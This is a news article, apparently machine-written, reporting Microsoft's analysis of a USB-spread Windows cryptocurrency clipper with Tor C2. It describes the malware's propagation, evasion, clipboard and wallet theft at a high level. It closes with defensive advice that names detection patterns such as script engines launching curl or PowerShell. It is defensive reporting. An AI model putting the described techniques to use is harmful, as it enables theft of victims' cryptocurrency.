Ethical Hacking News
Microsoft has unveiled a Windows-based cryptocurrency clipper campaign utilizing USB LNK worm and Tor-based C2, targeting users since February 2026. The malware carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution, posing significant threats to users' sensitive financial data.
The malicious operation targets users since February 2026 using Windows Script Host and ActiveX-driven logic. The malware steals high-frequency clipboard data, screenshot exfiltration, and wallet-address substitution. The attacks distribute a malicious Windows Shortcut file via USB storage devices to propagate the malware. The worm component ensures propagation to other uncompromised USB drives by deploying scheduled tasks. The malware uses WScript and ActiveXObject to interact with the operating system, evading detection. The malware periodically polls a C2 server for instructions while monitoring the clipboard about every 500 milliseconds. Microsoft recommends prioritizing behavioral detections and mitigations include disabling AutoRun/AutoPlay and blocking LNK execution from removable drives.
Microsoft has recently disclosed details of a Windows-based cryptocurrency clipper campaign that has been targeting users since February 2026. This malicious operation relies heavily on the use of Windows Script Host and ActiveX-driven logic to launch a bundled Tor proxy and poll a hidden-service Command-and-Control (C2) server.
The Microsoft Defender Security Research Team conducted an analysis of this campaign, shedding light on its functionality and modus operandi. According to their findings, the clipper malware in question carries out high-frequency clipboard theft, screenshot exfiltration, and wallet-address substitution. This type of malicious software is often referred to as a "clipper" due to its primary function of silently monitoring a user's clipboard and intercepting sensitive data pasted into the short-term buffer.
The attacks in question involve distributing a malicious Windows Shortcut (LNK) file via USB storage devices, which triggers a worm component that checks if the machine is already infected. If it is not present, the payload is fetched from a remote server. A second module deployed by this malware harvests and exfiltrates cryptocurrency wallet information.
The LNK payload scans the USB device for common document types like DOC, XLSX, and PDF, and if found, hides them and creates new LNK files with the same file names and containing arguments that line to the worm component. When an unsuspecting user launches the shortcut thinking they are opening a harmless document, it triggers the execution of the malware.
The worm component ensures propagation to other uncompromised USB drives by deploying scheduled tasks as a form of persistence for both the worm component and the stealer component. The clipper, for its part, uses WScript and ActiveXObject to interact with the operating system, and exits if Task Manager is among the list of actively running processes to evade detection.
In the final stage, the malware launches a renamed Tor binary in a hidden window, generates a unique victim identifier, and registers it with the external server. Once this step is complete, the malware enters a continuous loop, periodically polling the C2 server for instructions while simultaneously monitoring the clipboard about every 500 milliseconds to extract seed phrases and private keys.
It also hijacks cryptocurrency addresses by replacing copied wallet values with attacker-controlled alternatives and uploads screenshots through Tor. If the C2 returns an EVAL response, the malware executes attacker-supplied code at runtime.
To combat this threat, Microsoft has recommended that defenders prioritize behavioral detections over static signatures, specifically looking for PowerShell-based screen capture and the use of WScript, CScript, or related script engines for launching curl, cmd.exe, PowerShell, or unexpected executables. Other mitigations include disabling AutoRun/AutoPlay for all removable media, blocking LNK execution from removable drives via Group Policy Objects (GPOs), restricting unnecessary use of wscript.exe or cscript.exe, and reviewing clipboard-related and screen-capture behaviors on devices handling sensitive financial workflows.
Related Information:
https://www.ethicalhackingnews.com/articles/Microsoft-Unveils-Windows-Clipper-Malware-Campaign-Utilizing-USB-LNK-Worm-and-Tor-Based-C2-ehn.shtml
https://thehackernews.com/2026/06/microsoft-details-windows-clipper.html
Published: Thu Jun 18 11:54:25 2026 by llama3.2 3B Q4_K_M
